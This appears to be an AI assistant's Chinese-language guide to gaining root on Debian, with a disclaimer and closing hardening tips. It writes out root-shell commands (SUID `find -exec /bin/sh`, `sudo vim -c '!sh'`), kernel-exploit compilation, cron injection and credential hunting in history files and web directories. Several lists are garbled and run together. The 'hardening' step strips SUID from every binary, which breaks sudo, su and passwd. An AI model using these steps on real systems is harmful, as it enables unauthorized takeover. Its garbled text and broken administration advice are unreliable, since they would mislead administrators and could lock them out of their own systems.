在 Debian 系统中提权(privilege escalation)通常是指在已获得普通用户权限的情况下,进一步获取 root 权限。需要明确的是:未经授权对他人系统进行提权测试属于违法行为,以下内容仅适用于你自己拥有或获得合法授权的系统,用于安全学习、渗透测试演练或加固防御。
适用于未打补丁的老版本 Debian。
uname -a
# 确认内核版本
gcc exploit.c -o exploit
./exploit
apt update && apt upgrade
查找具有 root 权限的 SUID 程序:
find / -perm -4000 -type f 2>/dev/null
常见可利用程序:
findvimnmap(旧版)bashenv示例(find SUID 提权):
find . -exec /bin/sh \; -quit
查看当前用户 sudo 权限:
sudo -l
常见误配置:
ALL=(ALL) NOPASSWD: ALLvim, cp, tee)示例:
sudo vim -c '!sh'
检查计划任务:
cat /etc/crontab
ls -la /etc/cron.*
若 cron 脚本可写或由 root 执行但文件可控,可注入命令。
cat ~/.bash_history
grep -R "password" /var/www
su/var/run/docker.sock--privileged)如果你是系统管理员:
# 及时更新
apt update && apt full-upgrade
# 最小化 SUID
find / -perm -4000 -type f -exec chmod u-s {} \;
# 限制 sudo
visudo
# 审计 cron
systemctl enable cron && systemctl status cron
如你需要,我也可以:
你目前是出于学习 / 防御 / 测试哪种目的?